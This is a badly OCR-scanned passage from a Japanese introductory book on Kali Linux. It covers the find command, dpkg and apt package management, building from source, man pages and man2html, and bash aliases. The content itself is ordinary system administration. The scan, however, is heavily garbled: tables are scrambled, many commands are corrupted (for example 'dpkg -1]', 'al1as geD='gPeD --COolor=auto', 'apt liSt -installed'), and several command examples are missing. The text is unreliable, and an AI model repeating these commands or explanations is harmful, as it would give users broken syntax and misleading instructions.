検索 キー ワー ド に 正規 表現 を 利用 し ます 。 た だ し 、 こ の オプ ショ ン を 使用 し た 場 
合 に は 、 フ ァイル 名 で は な く 、 パ ス 全 体 が 対象 に な り ま す 。 





@ 種別 を 指定 する 


find コ マン ド に は 、 検 索 対 象 と し て 
「 フ ァイル の み 」「 デ ィ レ クト リ の み 」 と 


いっ た 種別 を 指定 で きま す 。-type オ プ lb | ブロ ッ ク デ バイ ス | 
ショ ン を 使い 、 そ の 後に 次 の タイ プ を 指 lc | キャ ラク タデ バイ ス 
定 し ます 。 よく 本 う タ イプ は 、。d と {で ld 。 | ディ レク トリ 


表 2-4 -tpe オ プシ ョ ン に 指定 する タイ プ 





し ょ う ( 表 2.)。 Ip 。 | 名 前 付き パイ プ 
例え ば 、 次 を 実行 する と 、/var/www" If | ファ イル 
ディ レク トリ か ら 、 す べ て の PHP フ ァ | | シンボリック リン ク 


イル を 検索 し ます 。 ls | ラッ タッ ト 
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2-8 | Kali に お ける イン スト ー ル テク ニッ ク 





光 Debian パッケ ー ジ を 管理 する dpkg 

Linux の 世界 で パッ ケー ジ と いう 言葉 が …mrm 場合 は 、 実 行 フ ァイル 、 設 定 
ファ イル 、 マ ニュ アル な どの 関連 文書 を まとめ た も の を 指し ます 。 

Debian は Debian パッケージ を 扱え ます 。Debian パッケージ は deb 形 式 で 配布 
され て お り 、dpkg コ マン ド で 管理 で きま す 。 

例え ば 、 deb 形式 で 配布 さき れ て いる ファ イル を ダウ ン ロ ー ド し 、 次 の よう に 入力 
する こと で 、 ぞ その パッ ケー ジ を イン スト ー ル で きま す 。 


# dpkg -i <deb 形 式 の ファ イル 名 > 


dpkg コ マン ド に より 、 パ ッ ケ ー ジ を 容 夫 に イン スト ー ル で きる だ け で な く 、 シ 
ステ ム の 設定 と の 整合 性 も 維持 で きる と いう メリ ッ ト が あり ます 


dpkg を 採 作 する APT 
ンス テム 内 に は 膨大 な Debian パ ッ ケ ー ジ が イン スト ー ル され て いま す (*53)。 
方 、 パ ッ ケ ー ジ に は 依存 関係 が あり ます 。 あ る パッ ケー ジ を 最新 に する た め に 
は 、 同 時 に 別 の パッ ケー ジ の 最新 版 が 求め られ る こと が あり ます 。 こ うし た 依存 
関係 を 手 作 業 で 管理 する こと は 非常 に 困難 と いえ ます 
その た め に 登場 し た 技術 が APT (Advanced Package Tool) で す 。APT は 内 部 
で dpkg コ マン ド を 実行 し つつ 、 パ ッ ケ ー ジ の 依存 関係 を 解消 し ます 。 さ ら に 、 シ 
ステ ム の 更新 $ も 行っ て くれ ます 。 つ まり 、APT は Debian に 搭載 され て いる パッ 
ケー ジ 管 理 シ ステ ム と いえ ます 。 
この APT の フロ ント エン ド と し て 、aptget コ マン ド や apt コ マン ド な ど が あり 
ます 。 apt-get コ マン ド は 従来 の APT から 備わっ て いた も の で す 。 
また 、apt コ マン ド は 2014 年 に 追加 され まし た 。 apt-get コ マン ド と 同等 の サ プ 


*53 : 次 の コマ ンド で イン スト ー ル 済み の Debian パッ ケー ジ の 数 を 特定 で きま す 


# dpkg -1] | wc -1 
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コマ ンド を 持ち つつ 、1 つ の コマ ンド で ほとん どの こと を 完結 で きる よう に な り ま 
し た 。 例 えば 、「 パ ッ ケ ー ジ を 検索 する と き は apt-get だ っ た か な 、 そ れ と も apt- 
cache だ っ た か な 」 と 悩む こと が な く な り ま し た 54)。 こ の 場合 、apt コマンド 
で あれ ば 、"apt search'" に な り ま す 。APT に 対す る 操作 は 、 サ プ コ マン ド で 指定 
する と いう 目 然 な 発想 に な っ た わけ で す 。 

Kai の Terminal で "apt と 入力 し て か ら 、 [Tab] キー を 2 回 押し て くだ さい 。 す 
る と 、Tab 補 完 さ れ て 、 次 の よう な 結果 に な り ま す 。 


root@ka1i:<# apt 


apt apt-config apt-get apt-sortpkgs 
apt-add-repository apt-extracttemplates apt-key 

apt-cache apt-file apt-1istchanges 

apt-cdrom apt-ftparchive apt-mark 


これ ら が APT の フロ ント エン ド の コマ ンド に な り ま す 。 apt 登 場 以前 は 、 こ れ 
ら の コマ ンド を 組み 合わ せる 必要 が あり まし た が 、 登 場 後 は その 負担 が 減り まし 
た 。 そ の た め 、Debian 管理 者 ハン ドブ ッ ク に よる と 、 現在 で は apt コ マン ド の 使用 
が 推奨 され て いま す "55)。Kali の 公式 サイ ト で は apt コ マン ド を 用 いて 解説 され 
て いる の で 、 本 書 で も apt コ マン ド を メイ ン に し て 記述 し ます ("56)。 

これ まで apt-get コ マン ド を 使っ て いた の に 、 途 中 か ら apt コ マン ド を 使い 始め 
て 大 丈夫 か と いう 心配 が ある か も し れ ま せん 。 し か し な が ら 、 問 題 あ り ま せん 。 
apt コ マン ド も apt-get コ マン ド も APT の フロ ント エン ド に 過ぎ ず 、 ど ちら の コマ 
ンド を 使っ て も APT は 内 部 で Debian パッ ケー ジ を 管理 し て いる た めで す 。 


氷 apt の 設定 ファ イル 
最新 の パッ ケー ジ は 、 イ ンタ ーネット 上 の リポジトリ (町 蔵 庫 ) に 存在 し ます 。 
"etc/apt/sourceslisSt ファ イル に リボ ポジ トリ の URL を 記載 する こと で 、apt 


54 : 従来 の コマ ンド で あれ ば 、 "apt-cache search' が 正解 で す 。 
*55 : Debian の サイ ト で は apt コ マン ド が 推奨 され て いま す 。 
https//debian-handbook.inio/browse/ja-」P/stable/sectaptgethtml 


*56 : 従来 の 書籍 で は apt-get コ マン ド で の 解説 が 多い で し ょ う 。 例え ば 、 従 来 の 書籍 で "apt-get 
install"' と 解説 され て いる と ころ は 、 "apt install'" に 衣 き 換え て 考え ます 。 
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update コ マン ド を 実行 し た と き に リポ ボ ジ ト リ か ら パ ッ ケ ー ジ を ダウ ン ロ ー ド し ます 。 
"etc/apt/sourceslist' フ ァイル は 、 次 の よう な 書式 の エン トリ で 構成 され ます 。 





ある い は 、 





deb は 、 主 に deb パ ッ ケ ー ジ の リス ト の 取得 に 用 いら れ ま す 。 一 方 、deb-src は 、 
deb パ ッ ケ ー ジ の 構築 に 必要 な ソー スコ ー ド な どの リス ト の 取得 に 用 いら れ ま す 。 

それ で は 、Kali の "/etc/apt/sources.list' ファ イル を 確認 し て み ま す 。 する と 、 次 
の よう な エン トリ が 記述 され て いま す 。 





kali-roling と いう ディ スト リピ ビュ ーション で ある こと が わか り ま す 。 

基本 的 に ソー ス の リス ト は 不要 な の で 、 デ フォ ルト で は deb-src に コメ ント アウ 
ト が 付い て いま す 。 ソ ー ス を 必要 と する 場合 に は 、 こ の コメ ント アウ ト を 外し ま 
す 。 た だ し 、 ソ ー ス も 取得 し に 行く の で 処理 に 時 間 が か か る よう に な り ま す 。 

コン ポー ネン ト に は ダウ ン ロ ー ド する も の を 指定 し ます 。 Kalii で は 、 コ ン ポ ー ネ 
ント に main、non-free、contrib が 指定 され て いま す ( 表 2-5)。 


表 2-5 コン ポー ネン ト の 種類 


Debian の フリ ー ソ フト ウェ ア の ガイ ドラ イン に 合致 する も の で 、 再 配布 可能 な 
パッ ケー ジ や 、 ソ ー ス が 公開 され て お り 配 布 が 無制限 の も の 。 





再 配布 が 禁止 され た パッ ケー ジ 。 
lee 


パッ ケー ジ は main で ある が 、 依 存 し て いる パッ ケー ジ が non-free で ある も の 。 
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コン ボー ネン ト の 順番 は 関係 あり ませ ん 。 ま た 、 ほ と ん どの ケー ス で 、 3 つの コ 
ン ボ ポー ネン ト が 同時 に 指定 され て いま す 。 


apt update コマ ンド の 実行 時 の エラ ー 


Kalii の バー ジョ ン が 古く な る と 、apt update コマ ンド を 実行 し た と き に エラ ー 
が 発生 する こと が あり ます 。 この 多く の 理由 は 、 リ ポジ トリ の URL が 古かっ た り 、 
間違っ て いた りす る た めで す 。 エ ラー が 発生 し た 場合 に は 、 公 式 サ イト の 情報 を 
参照 し て くだ さい 。 


Kal11 sources .1st Repos1tor1es 
https : / /docs . ka1i .org/genera1 -use/ka]i- 11inux- sources- 11st-。」 


PeDOS1tor1esS 


沙 apt コ マン ド の 代表 的 な 使い 方 


表 2-6 様々 な apt の サブ コマ ンド 


| コマンド)。)。。、 IIWIv ョ の ね や よこ ここ べべ ね 


パッ ケー ジ の 一 覧 を 更新 する 。 
リポ ジ ト リ を 追加 ・ 削 除 し た 際 に は 必ず 実行 する 。 


全 / パッ ケー ジ を 更新 する 。 
apt upgrade 通常 の パッ ケー ジ の 更新 時 は この コマ ンド を 用 いる 。 


全 パ ッ ケー ジ を 更新 する 。 
PP 保留 し て いる パッ ケー ジ も 更新 する 。 
更新 に と も な い 不要 に な っ た パッ ケー ジ を 削除 する ("57)。 
apt autoremove apt 実 行 時 に この コマ ンド の 実行 を うな が され る こと が ある の 
eg パッ ケー ジ や deb フ ァイル を イン スト ー ル する 。 
= っ ーー - ーー コ い PP 、 | ロー カル に ある deb ファ イル を 指定 する 際 に は 、 フ ァイル 名 だ 
P の け で な く デ ィ レ クト リ 名 か ら 入 力 する 必要 が ある 。 


バッ タージ を 削除 する 。 
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apt purge く パ ッ ケ ー ジ 名 > | パッ ケー ジ を 完全 に 削除 する (*58)。 
バッ ケージ を 検索 す る (人 - 和 
タージ の を 示す 


apt liSt く パ ッ ケ ー ジ 名 > パッ ケー ジ 名 を も と に パッ ケー ジ の 一 覧 を 表示 する 。 


パッ ケー ジ さ れ て いる 全 キ ャ ッシュ を 削除 する 。 
apt clean ダウ ン ロ ー ド し た deb パ ッ ケ ー ジ は キャ ッシュ され る 。 この コマ 
ンド に より これ ら を 削除 し て 、 デ ィ ス ク の 容量 を 空け る 。 


キャ ッシュ され て いる が 、 イン スト ー ル され て いな い deb ファ イ 


aptISt | 全 パ ッ ケ ー ジ の 一 覧 を 表示 する 。 
apt liSt -installed イン スト ー ル 済み の パッ ケー ジ を 一 覧 表示 する ("59)。 


パッ ケー ジ の 依存 関係 を 表示 する 。 

指定 し た パッ ケー ジ が 依存 (Depends)、 提案 (Suggests)、 推 
奨 (Recommends)、 競合 (Conflicts) し て いる パッ ケー ジ を 
表示 する 。 


depends と は 逆 。 指 定 し た パッ ケー ジ が 依存 (Depends)、 提 
apt rdependS こく パッ ケー ジ 名 > | 案 (Suggests)、 推奨 (Recommends)、 競合 (Conflicts) さ 
れ て いる パッ ケー ジ を 表示 する 。 


apt depends く < パッ ケー ジ 名 > 





訪 dpkg コマ ンド と apt コマ ンド の 使い 分 け 

アプ リケーション に よっ て は 、 リ ボ ポジ トリ か ら パ ッ ケ ー ジ を 取得 で きず 、 公 式 
サイ ト か ら deb 形 式 の ファ イル を 入手 する 必要 が あり ます 。 

apt コ マン ド の 登場 以前 は 、 次 の よう に dpkg コ マン ド を 使う の が 一 般 的 で し た 。 


*57 : パッ ケー ジ を 削除 する こと で 、 別 の パッ ケー ジ も 不要 に な る こと が あり ます 。 し か し 、apt 
remove コ マン ド は この 不要 な パッ ケー ジ ま で 削除 し ませ ん 。 こ うし た パッ ケー ジ を シス テム か 
らき れい に 取り 除く の が 、apt autoremove コ マン ド で す 。 

*58 : パッ ケー ジ を 削除 し て も 、"/etc" な ど に は ユー ザー が 修正 し た 設定 ファ イル が 残る こと が あ 
り ま す 。 残す 理由 は 、 再 イ ンス トー ル し た と き に その 設定 ファ イル を 再 利用 する た めで す 。 こ う 
し た 設定 ファ イル も 完全 に 削除 し た い 場 合 に は 、apt purge コマ ンド を 用 いま す 。 


*59 : apt 以 前 か ら 使え る コマ ンド は 次 の 通り で す 。 


# dpkg -1 
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し か し パッ ケー ジ の イン スト ー ル に と も な い 、 依 存 関 係 に 問題 が ある と イン ス 
トー ル さ れず に エラ ー に な り ま す 。 こ の と き は 依存 性 を 解決 する 必要 が あり ます 。 
実際 の と ころ 、apt コマ ンド は deb フ ァイル を 指定 し て イン スト ー ル で きま す 。 


よっ て 、 基 本 的 に は apt コ マン ド で 一 本 化し て も 問題 あり ませ ん 。 








光 ソー ス か ら ビ ルド する 方 法 

現在 で は 大 抵 の ソフ トウ ェ ア が リポ ボ ポジ トリ で 管理 され て いる の で 、apt コ マン ド 
で イン スト ー ル で きま す 。 と ころ が 、 リ ボ ジ ト リ に 存在 せ ず 、 ソ ー ス し か 公開 し 
て いな いと いう ケー ス が あり ます 。 こ の と き は 、 昔 な が ら の 方 法 で ある 、「 ソ ー ス 
か ら ビ ルド 」 と いう アプ ロー チ を 採用 し ます 。 

ここ で は 、 ダ ウン ロー ド し た ファ イル が "hoge.tar.gzZ"” だ っ た と し ます 。 


①) フ ァイル を 展開 する 
tar コ マン ド で 展開 し ます 。 


② 環 境 設定 を 行う 
次 の コマ ンド で 環境 設定 を 行い ます 。 





この と き に 必要 な パッ ケー ジ が な か っ た り 、 パ ッ ケ ー ジ や ライ プラ リ の バー 
ジョ ン が 古かっ た りす る と エラ ー が 出 ま す 。 こ こ で エラ ー が 出 な いよ うに 依存 を 
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解消 し て お きま す 。 


③⑬③ ビ ルド する 
次 の コマ ンド で ビル ド し ます 。 





(④ イ ンス トー ル す る 
最後 に 、 イ ンス トー ル し ます 。 


な お 、make instal コ マン ド で イン スト ー ル せ ず に 、 次 の よう に Debian パッ 
ケー ジ を 作成 する こと も で きま す 。 











deb フ ァイル が 生成 され た ら 、apt コ マン ド で イン スト ー ル で きま す 。 こ うし て 
お け ば 、APT の 管理 対象 と な り ま す 。 





@ ソー ス が 公開 され て いな い 場 合 

まれ に 、 ソ ー ス が 公開 され て いな か っ た り 、 ラ イセ ンス の 問題 が 絡ん で いた り 
する ソフ トウ ェ ア は 、 リ ポジ トリ に 存在 し な い だ け で な く 、Debian パッ ケー ジ も 
配布 され て いな いこ と が あり ます 。 こ の と き は 、README フ ァイル が 存在 する は 
ず な の で 、 そ れ を 読ん で 指示 通り に イン スト ー ル し ます 。 
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2-9 | いつ で も どこ で も 調べ も の 





調べ も の を 解 : 決 す る に は 、 | 書 「 知 ( 紙 媒 体 や 電子 書 束 球 ) ei | ネネ の ト で 検 


索 す る 」 と いう 方 法 が 一 般 的 と いえ ます 。 それに wm 、| 公式 マ ニュ アル を 読む 」 
「man コ マン ド を 活用 する 」「RFC を 読む 」 re こと で 、 よ り 効 率 
的 か つ 詳 細 に 目的 の 情報 を 収集 で きま す 。 

本 書 の テー マ の 1 つ で ある | いつ で も どこ で も 」 を 実現 する た め に は 、man コ ~ 


ンド が 非常 に 有効 で す 。 


水 man コマ ンド を 活用 する 

Linunx に は デジ タル の マニ ュ ア ル が 用 意 さ れ て いま す 。 当然 な が ら Kali に も 用 
意 さ れ て いま す 。 こ の マニ ュ ア ル に は 、 Linux の 機能 、 デ ィ レ クト リ や コマ ンド の 
説明 、 設 定 フ ァイル の 記述 の 仕方 な ど が 記載 され て いま す 。 ディ スト リピ ビュ ー 
ン ョ ン に よっ て Linux に は 多少 の 合 い が あ り ま す 。 そ うい っ た 中 で 最も 信頼 で き 
る 情報 の 1 つが 、 イ ンス トー ル さ れ て いる マニ ュ ア ル な の で す 。 

この マニ ュ ア ル は man (manual の 略 ) と 呼ば れ 、 Terminal で man コ マン ド を 


実行 する こと で 読め ます 。 引 数 に 調べ た い キ ー ワ ー ド を 指定 し ます 。 


$ man < キー ワー ド > 


man コ マン ド を 実行 する と 、Terminal 内 に て ペー ジャ で 表示 され ます 。 ペー ジャ 
と は 、 テ キス ト フ ァイル や コマ ンド の 出力 を 表示 する こと に 特 化 し た 、 動 作 の 軽い 
プロ グラ ム の こと で す 。 デ フォ ルト で は less コマ ンド が 適用 され て いま す 

less コマ ンド の 操作 方 法 が わか ら な い 場 合 は 、[h] キー を 押し ます 。 基 本 的 な 操 
作 は 、 上 下 キ ー で 1 行 ず つ ス クロ ー ル 、[Space」 キー で ペー ジ 単 位 の スク ロー ル 、 
lgl キー で マニ ュ ア ル が 音 了 し ます 。 そ し て 、L レ /] キー で 模索 し 、Lnj キー で 次 
を 検索 、[Shift] + [nm] キー で 1 つ 前 を 検索 し ます 。 

マニ ュ ア ル の 内 容 が 膨大 で あっ て も 、 す べ て 理解 する 必要 は あり ませ ん 。 知り 
だ た いこ と が わか れ ば 十分 で す 。 


60: PP オプ ショ ン で ペー ジャ を 指定 で きま す 。 例え ば 、man -P head < キー ワー ド > と すれ ば 、 
head コマ ンド が 適用 され ます 
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協 セクシ ョ ン 番 号 
マニ ュ ア ル は 、 内 容 の 種類 ご と に セク ショ ン 番 号 が 割り 振ら ちら れ て いま す ( 表 2-7) 
(*61)。 


表 2-7 セク ショ ン 番 号 
: ン ェ ル を 通じ て ユー ザー ー が 実行 で 
を ダー コマ ンド イー 
カー ーー 


ュー ライ ブラ リコ ー ル (シス テム 関数 ) io の 関 で log な 


ayyzz7z み 72 イ な 5059| = =  。 
5 | ファ イル フォ ー マ ッ ト と ファ イル 変換 人 が 読め る ファ イル の フォ ー マ ッ ト 。 


プロ トコ ル 、 文字 集合 の 規則 、 マ ク 
ロロ の パッ ケー ジ な 3 


|8 " | シス テム 管理 用 の コマ ンド や デー モン root の み が 実 行 で きる コマ ンド 。 


セク ショ ン 番 号 を 指定 する こと で 、 そ の 種類 の マニ ュ ア ル が 表示 され ます 。 導 
に モク ショ ン 番 号 を 指定 し な いと 、 複 数 の 場所 で 解説 され て いる 内 容 で あれ ば 、 
セク ショ ン 番 号 の 小さ い 方 が 優先 し て 表示 され ます 。 

例え ば 、 シ ェ ル コマ ンド と ライ ブラ リ 関 数 に は 、"printf と いう 同一 名 の キー 
ワー ド が あり ます 。 こ の と き 、"man printf' と 入力 する と 、 セ クシ ョ ン 番 号 が 小さ 
い シ ェ ル コマ ンド の マニ ュ ア ル が 表示 され ます 。 そ こ で 、 ラ イブ ラリ 関数 の 解説 
を 読み た い 場合 に は 、 次 の よう な 書式 で セク ショ ン 番 号 も 指定 し ます 。 つ まり 、 
"man 3 prinff と 入力 すれ ば よい こと に な り ま す 。 





$ man < セク ショ ン 番 号 > < キー ワー ド > 


*61 : Linux の 個 用 に お いて は 1、5、8、 プ ログ ラミ ング に お いて は 2、3 を 参照 する こと が 多い と 
いえ ます 。 


*62 : デバ イス の 入出 力 に 関す る ファ イル の こと で す 。 
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知り た い キ ー ワ ー ド が どの セク ショ ン 番 号 に 登録 きれ て いる か を 確認 し た い 場 
合 は 、k オ プシ ョ ン を 使用 し ます 。-k オ プシ ョ ン は 、 マ ニュ アル の タイ トル や イン 
デック ス の 文章 内 で 検索 し ます 。 


$ man -k < キー ワー ド > 


な お 、 マ ニュ アル の 全文 を 検索 する に は 、-K オ プシ ョ ン を 使用 し ます 。 

検索 結果 が 膨大 に な っ て し まう 場合 に は 、grep を 併用 し て 絞り 込み ます 。 例え 
ば 、 フ ァイル の 表示 に つい て 調べ た い 場 合 に は 、 キ ー ワ ー ド に print を 指定 し 
て 、 同 時 に grep で file を 指定 し ます 。「|-color=auto] は マッ チ し た 部 分 を 色づけ 
す あ オプ ショ シン で す 。 


$ man -k print | grep --color=auto fi]e 


沙 man の 日 本 語 化 

最近 の ディ スト リ ビ ュ ーション は 、 イ ンス トー ル 時 に 日 本 (日 本 語 ロ ケー ル ) を 
指定 する と 、 多 く の 場 合 man コマ ンド の 出力 が 日 本 語 化 さき れ ま す 。 し か し 、man 
の 内 容 の すべ て が 日 本 語 化 きれ て いる わけ で は あり ませ ん 。 つ まり 、 日 本 語 化 き 
れ て いる man に は 、 オ リ ジ ナ ル (英語 ) の man と 比べ て 足り な いも の が ある と い 
生ま 補 吉 。 

こう し た 問題 を 回 避 す る た め に は 、 最 初 か ら オ リ ジ ナ ル の man を 読む 習慣 を つ 
けた 方 が よい と いえ ます 。 本書 の 通り に Kali を イン スト ー ル し た 場合 に は 、man 
は 英語 で 表示 され る の で 問題 あり ませ ん 。 

どう し て も 日 本 語 で 知り た いと いう 場合 に は 、 ネ ッ ト で 検索 し て 日 本 語 化 さ れ 
だ た オン ライ ン の man を 探す と よい で し ょ う 。 


汐 man2html を 導入 する 

man は 古く か ら 存 在 す る た め 、 様々 な 活用 法 が 提案 され て いま す 。 man2html を 
イン スト ー ル する と 、 プ ラウ ザ で man を 参照 で きる よう に な り ま す 。 自然 に キー 
ワー ド 検 索 で きる の で 、man コ マン ド よ り も 直感 的 に 使い や すい と いえ ます 。 
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①)man2html を イン スト ー ル する 
man2html を イン スト ー ル し ます 。 





②CGI の 実行 を 有効 に する 

Linux の シス テム に よっ て は 、 こ の 段階 で プラ ウザ の URL 欄 に http://localhost 
/cgi-bin/man/man2html を 入力 すれ ば 、man が 表示 され ます 。 し か し 、Kali の 場 
合 、404 (Not Found) に な り ま す 。 

イン スト ー ル 後に 、"usr/lib/cgi-bin/man/man2html' ファ イル が 配置 され ま 
す 。"/usr/lib/cgi-bin" ディ レク トリ は CGI プロ グラ ム を 格納 する ディ レク トリ で 
す 。 正しく 配置 され て いる に も か か わら ず 表 示さ れ な い の は 、Apache で CGI の 実 
行 が 無効 に な っ て いる か ら で す 。 

次 の コマ ンド を 実行 し て 、CGI の 実行 を 有効 に する cgid モ ジュ ー ル を 組み 込み 
ます (63)。 cgid モジ ュー ル を 組み 込ん だ ら 、Apache を 再起 動 し ます 。 





⑬ ブ ラウ ザ で man を 参照 する 

ラン チャ ー か ら Firefox を 起動 し て 、URL 欄 に http://localhost/cgi-bin/man/ 
man2html を 入力 し ます 。 "Manual Pages - Main Contents'” と いう ペー ジ が 表示 さ 
れれ ば 成功 で す ( 図 2-79) 。 


*63 : Kalii で は Apache の 設定 ファ イル が 日 的 別に 分 割 き れ て いま す 。a2enmod コマ ンド で モ 
ジュ ー ル を 有効 、a2dismod コマ ンド で モジ ュー ル の 無効 を 適用 で きま す 。 
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を 6 locaihostcq-blymarman2html で lQ Seawch 商 自 まほ 舎 g 


国 Most Vsacdy 証 Offcnsivc Sccumty WMKali Unux Kali Docs Kali Toots Explot-DB 得 Arcreck-nq 


Mianual Pagqes - IMiain Contemnts 


Name and Sectiomn lookup 
| sean 
You can enter a proqram name, possibly precedled by the section, the directories to search (with 
-M) or n hl name. For example: 
e find 
9 1 find 


@ - 朋 5「/share/md:/0Dt/nan:/UST/Local/share/mdn TnO 
の /0S『/5hare/N/IMI/OPGTT.1 


Index of pages by name and description 


Sectons: 人 
Formats: 6.Games: 7. Mlscellany: 8.AdministraUon and Priyilened Comman(is. 


Index of pages by nammne only 





Manual Pages fll text search 


図 2-79 ブラ ウザ で の 表示 


④) 外 部 環境 か ら ア クセ ス で きる こと を 確認 する 

以上 で ロー カル 環境 か ら man2html に アク セス で きま し た が 、 外 部 環境 か ら も 
アク セス で きる こと を 確認 し ます 。 ホス ト OS で プラ ウザ を 立ち 上 げ て 、 URL 欄 に 
http://<Kalii の IP アド レス >/cgi-bin/man/man2html を 入力 する と 、 同 じ ペ ー ジ に 
アク セス で きる は ず で す 。 

以上 で man2html の 導入 は 完了 で す 。 これ で 直感 的 か つ 効 率 的 に man を 参照 で 
さる よう に な り ま し た 。 
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2-10 エイ リア ス を 活用 する 





エイ リア ス と は 、Linux に お いて コマ ンド を 別 の 名 前 に 置き 換え る 仕組 み で す 。 

般 に 長い コマ ンド き # PMP か 
し た りす る だ た だめ に 用 いま す 。 結果 と し て 、 タ イプ 数 や タイ プ ミ ス を 減ら せま す 
Kai で は 、ls コ マン ド だ け に 次 の よう な エイ リア ス が 設定 され て いま す 。 通常 の 
ファ イル 、 圧縮 ファ イル 、 実 行 権限 の ある ファ イル 、 デ ィ レ クト リ を 区 別 で きる 
よう に 色分け され ます 。 


alias ls=']s --color=auto 


光 エイ リア ス の 登録 方 法 


エイ リア ス を 登録 する に は 、alias コマ ンド を 用 いま す 。 例 
を 人 力 し て ls | コマ ンド が 実行 され る よう に する に は 、 次 の よう に し ます (ユー 
ザー 権限 で 実行 可能 )。 


ラリ 


えば 、 Terminal に 


Poot 貼 ka11:< せ alias ]1=']1s -1「 


この と き 、|=」 の 前 後に は スペ ー ス を 採 : な お 、umnalias コ 


まな いよ うに し ます 。 
マン ド を 用 いる と 、 エ イリ アス を 削除 で きま す 。 


root 仙 ka11:< せ unalias 11 


エイ リア ス を 削除 せ ず に 、 


パッ クス ラッ ン ュ 


- 時 的 に エイ リア ス を 解除 する 場合 に は 


、 先 頭 に 
(ある い は 辛 ) を 指定 し ます 


POot 幼 ka11:-# \1s 


(色分け され て いな い 表 示 ) 
Poot 細 ka11:< 韻 1S 
(色分け され て いる 表示 ) 


エイ リア ス が 適用 され て いる 。 
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但 常 に エイ リア ス を 適用 し た い 場 合 

alias コ マン ド で エイ リア ス を 設定 し た 場合 、 新 た に シェ ル を 起動 する と 元 に 
戻っ て し まい ます で 64)。 

bash が 起動 する と 、".bashrc ファ イル が 読み 込ま れ ま す 。 そ の た め 、 こ の ファ 
イル や ここ か ら 読 み 込 まれ る ファ イル に エイ リア ス の 設定 を 記述 する こと で 、 常 
に エイ リア ス が 適用 され ます 。 

ホー ム デ ィ レ クト リ 内 の "bashrc' ファ イル に 直接 エイ リア ス の 設定 を 書き 込 
ん で も よい の で す が 、 こ こ で は ".bash_aliiases ファ イル に 書く よう に し ます 
(*65)。Kali で は 、".bash_aliases"” ファ イル が 存在 しない の で 、 新 規 に 作成 し ます 。 
その 中 に 次 の よう な 書式 で 記述 し て いき ます 。 


".bash_aliases" ファ イル 


alias 1='l]s -1" 
al1as geD='gPeD --COolor=auto 


( 略 ) 


bash aliaseSs ファ イル は 後半 に 読み 込ま れる の で 、".bashrc ファ イル に 同じ 
名 前 で エイ リア ス が 設定 され て いて も 、".bash_aliasess ファ イル の 方 が 優先 され ま 
す 。 


汰 独 目 コマ ンド を エイ リア ス に 追加 する 


人 で grep コマ ンド 


grep コ マン ド は 指定 し た キー ワー ド を 検索 する キー ワー ド で す 。 次 の よう に 
-color オ プシ ョ ン を 使う こと で 、 該 当 し た キー ワー ド が 反転 し ます 。 


64: シェ ル と は 、 入 力 し た コマ ンド を モノ に 実体 化す る 翻訳 機 の よう な も の で す 。 例 えば 、cal を 
入力 すれ ば ぱ ば 、 カ レン ダー を 出力 し ます 。 一般に Terminal を 通じ て 翻訳 され る た め 、[| シェ ル = 
Terminall と と ら え て も ほとん と 問題 あり ませ ん 。 つ まり 、 Terminal を 起動 し 直し た り 、 ロ グイ 
ン し 直し た りす る と 、 設 定 し た エイ リア ス が 消え る と いう こと で す 。 

65 : ディ スト リピ ビュ ーション に よっ て は 、".bash_aliases ファ イル を 読み 込む 処理 が コメ ント ア 
ウト され て いる こと も あり ます 。 こ の と き は コメ ント アウ ト を 消し ます 。Kalii で は コメ ント アウ 
ト さ れ て いま せん 。 
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人 @ 昌 コマ ンド 
ls 1 コマ ンド は よく 使い ます 。 そ こ で 、 こ れ を Il に 登録 し て お く と 便利 で す 。 





@ コマ ンド 


カレ ント ディ レク トリ を 1 つ 上 に 移動 する た め に 使い ます 。 こ れ も る 頻 筐 に 実行 
する 操作 な の で 、 効 率 化 に つなが り ま す 。 





但 rm コマ ンド 

rm コマ ンド は ファ イル を 削除 する コマ ンド で す 。 

エイ リア ス の 例 と し て 、 次 の も の が 紹介 され る こと が よく あり ます 。 そ の 理由 
は 「 不 注意 で ファ イル を 削除 する こと を 防げ る か ら 」 と され て いま す 。 





確か に 、: オ プシ ョ ン を 付け る こと で 、 削除 する 前 に 確認 メッ セー ジ が 表示 され 
る よう に な り ま す 。 し か し 、 こ の エイ リア ス に 慣れ て し まう と 大 変 危険 で す 。 こ 
の エイ リア ス が 設定 され て いな い シ ステ ム で 、 エ イリ アス が 効い て いる つも り で 
rm コマ ンド を 実行 し て し まう と 一 発 で ファ イル が 削除 きれ て し まう た めで す 。 

こう し た リス ク を 考え る と 、 こ の エイ リア ス の 設定 を 止め 、rm コマ ンド の 実行 
時 に は オプ ショ ン を 付け る こと を 習慣 づけ た 方 が よい と いえ ます 。 ま た 、 別 名 の 
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エイ リア ス を 定義 し て 、 そ れ を 使う と いう アプ ロー チ も 有効 で す 。 エ イリ アス が 
設定 され て いな い 環 境 で del を 実行 し て も 、"command not found が 表示 され る だ 
け で それ 以上 何 も 起 こり ませ ん 。 


alias del='"Fm - ュ '" 


人 で gs コマ ンド 


開発 で git を 利用 し て いる 場合 、 git status コマ ンド を た び た び が 使用 し ます 。 その 
だ め 、 エ イリ アス に 設定 し て お く と よい と いえ ます 。 


al1ias gs='git status " 


ここ で は 基本 的 な エイ リア ス を 紹介 し まし た 。 お 気に入り の エイ リア ス を 探す 
こと を お すす めし ます 。 


次 の エイ リア ス を 登録 する こと で 、powerup コマ ンド を 実行 する だ け で シス テ 
ム 全体 を アッ プ デ ー ト で きま す 。 コ マン ド を 連続 し て 実行 する た め に 「[&&」 演算 
子 を 使っ て いま す (コマ ンド が 失敗 する と 、 そ の 後 の コ マン ド は 実行 され な い )。 


al1ias powerup='apt update && apt upgrade -y && apt dist-upgrade 
-y && apt autoremove -y && apt autoclean -y' 


し ば らく ぷり に 実行 する と 、 す べ て の 処理 を 実行 し 共 え る に は か な り の 時 間 が 
か か る こと に 注意 し て くだ さい 。 
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A や た ゴジ ルン ルレ ルカ パリ に こ 
s。 


ホス ト OS の 
基本 設 








ハル ハッキング の 実験 は VirtualBox の ゲス ト 08 上 で 行い 、 日 常に お ける 作業 
や 開発 ( 速 隔 操作 で の プロ グラ ミン グ も 含む お ) な ど は 使い 慣れ た ホス ト O0S で 
行い ます 。 

本 草 で は 、 ハ ッ キ ング ・ ラ ボ の 運用 と いう 欠点 お か お ら 、 ホ スト OS で ある 
Windows 10 の 操作 性 を 向上 させ る 方 法 を 紹介 じ ま す 。 


ュ 
に 


か 


3-1 | ファ イル の 拡張 子 を 表示 する 





Windows 7 /8.1 / 10 の デフ ォ ル ト 設 定 で は 、 シ ステ ム に 登録 され た 抜 張子 が 表 
示さ れ な い 設 定 に な っ て いま す 。 こ の 状態 で は 、 拡 張子 で ファ イル の 種別 を 認識 
